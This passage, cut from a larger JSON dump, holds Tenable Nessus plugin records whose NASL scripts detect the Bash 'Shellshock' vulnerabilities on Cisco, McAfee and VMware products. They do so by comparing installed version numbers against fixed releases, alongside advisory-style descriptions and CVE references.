"CISCO-SA-CSCUR01959-PRSM.NASL", "href": "https://www.tenable.com/plugins/nessus/78828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78828);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The management application installed on the remote host is affected by\na command injection vulnerability known as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Security Manager installed on the remote host is affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock. The\nvulnerability is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Prime Security Manager 9.3.2.1 (9) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_security_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prsm_web_detect.nasl\");\n script_require_keys(\"installed_sw/Cisco PRSM\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"http_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"cisco_func.inc\");\n\napp = 'Cisco PRSM';\n\nport = get_http_port(default:443, embedded:TRUE);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nbase_url = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nfix = '9.3.2.1 (9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x blow 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + base_url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, base_url, ver);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:25", "description": "The remote host has a version of McAfee Next Generation Firewall (NGFW) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-13T00:00:00", "type": "nessus", "title": "McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:ngfw"], "id": "MCAFEE_NGFW_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79234", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79234);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Next Generation Firewall\n(NGFW) installed that is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:ngfw\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_ngfw_version.nbin\");\n script_require_keys(\"Host/McAfeeNGFW/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Next Generation Firewall\";\nversion = get_kb_item_or_exit(\"Host/McAfeeNGFW/version\");\n\n# Determine fix.\nif (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.[0-3]\\.\"\n) fix = \"5.3.11.9128\";\nelse if (version =~ \"^5\\.[45]\\.\") fix = \"5.5.11.9904\";\nelse if (version =~ \"^5\\.7\\.\") fix = \"5.7.5.11048\";\nelse if (version =~ \"^5\\.8\\.\") fix = \"5.8.0.12042\";\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:50", "description": "The remote host has a version of McAfee Web Gateway (MWG) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-12T00:00:00", "type": "nessus", "title": "McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:web_gateway"], "id": "MCAFEE_WEB_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79215", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79215);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Web Gateway (MWG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB83022\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:web_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_web_gateway_detect.nbin\");\n script_require_keys(\"Host/McAfee Web Gateway/Version\", \"Host/McAfee Web Gateway/Display Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Web Gateway\";\nversion = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Display Version\");\n\nfix = FALSE;\n\nif (\n version =~ \"^6\\.\" ||\n version =~ \"^7\\.[0-4]\\.\"\n)\n{\n fix_display = \"7.4.2.3 Build 18233 / 7.5.0\";\n fix = \"7.4.2.3.0.18233\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version_display +\n '\\n Fixed version : ' + fix_display +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version_display);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T16:13:50", "description": "The remote VMware ESX host is affected by multiple vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - A out-of-bounds read error exists in the redirection implementation in file parse.y when evaluating untrusted input during stacked redirects handling. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the read_token_word() function in file parse.y when handling deeply nested flow control structures. A remote attacker can exploit this, by using deeply nested for-loops, to cause a denial of service or possibly execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-12-30T00:00:00", "type": "nessus", "title": "VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1"], "id": "VMWARE_VMSA-2014-0010_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/87680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87680);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX host is affected by multiple vulnerabilities \nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables. This\n allows a remote attacker to execute arbitrary code via\n environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271,\n CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - A out-of-bounds read error exists in the redirection\n implementation in file parse.y when evaluating\n untrusted input during stacked redirects handling. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the\n read_token_word() function in file parse.y when handling\n deeply nested flow control structures. A remote attacker\n can exploit this, by using deeply nested for-loops, to\n cause a denial of service or possibly execute arbitrary\n code. (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000278.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0 / 4.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\n\npci = FALSE;\npci = get_kb_item(\"Settings/PCI_DSS\");\n\nif (\"ESX \" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX\");\n\nesx = \"ESXi\";\n\nextract = eregmatch(pattern:\"^ESX (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX\");\nelse\n ver = extract[1];\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"2167889\",\n \"4.1\", \"See vendor\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESX.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware ESX\", ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif(!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n\nif (!pci && fix == \"See vendor\")\n audit(AUDIT_PCI);\n\nvuln = FALSE;\n\n# This is for PCI reporting\nif (pci && fix == \"See vendor\")\n vuln = TRUE;\nelse if (build < fix )\n vuln = TRUE;\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version : ESX ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else\n security_hole(port:port);\n\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "According to its self-reported version, the remote NX-OS device is affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-27T00:00:00", "type": "nessus", "title": "Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20140926-BASH-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/78693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78693);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01099\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04438\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04510\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05529\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05017\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuq98748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02102\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02700\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is running a version of NX-OS that is affected by\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote NX-OS device is\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the suggested fixed version referred to in the relevant\nCisco bug ID. Note that some fixed versions have not been released\nyet. Please contact the vendor for details.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\n\nfixed = '';\nbug_ID = '';\n\n# MDS 9000 NX-OS prior to 5.0(8a) / 5.2(8e) / 6.2(9a)\nif (device == 'MDS' && model =~ \"^9[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur01099';\n\n if (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.0\\([0-7][A-Za-z]?\\)\" ||\n version =~ 